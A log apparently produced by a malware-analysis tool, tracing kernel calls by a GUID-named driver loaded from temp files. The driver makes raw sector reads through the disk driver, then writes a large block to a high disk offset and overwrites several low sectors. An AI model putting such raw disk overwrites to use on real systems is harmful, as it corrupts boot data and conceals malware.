    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 1.tmp: nt!IoBuildDeviceIoControlRequest
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A63E70 [IRP_MJ_DEVICE_CONTROL ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9DE00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E200 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9E800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A0E 3.tmp: nt!IoBuildDeviceIoControlRequest
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A1C 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_DEVICE_CONTROL ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BB5 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_DEVICE_CONTROL \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EA00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EC00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90200 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FB9EE00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A5D298 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81986888, 512, 0000cs:7FB90400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B550 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDB600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FBE3400 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDB800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 1.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 1.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x81967E00, 512, 0000cs:7FBE3600 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBDBA00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 1.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x81A6EB50 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 1.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x8196B430 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    ...
    ...
    ...
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBE3800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 0000cs:7FBE3A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AE4 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7C00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_READ ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_READ \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x818D9000, 232448, 0000cs:7FB90000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7800 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7A00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 00000000cs:7C00 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2AC7 3.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2939 3.tmp: nt!KeInitializeEvent
    
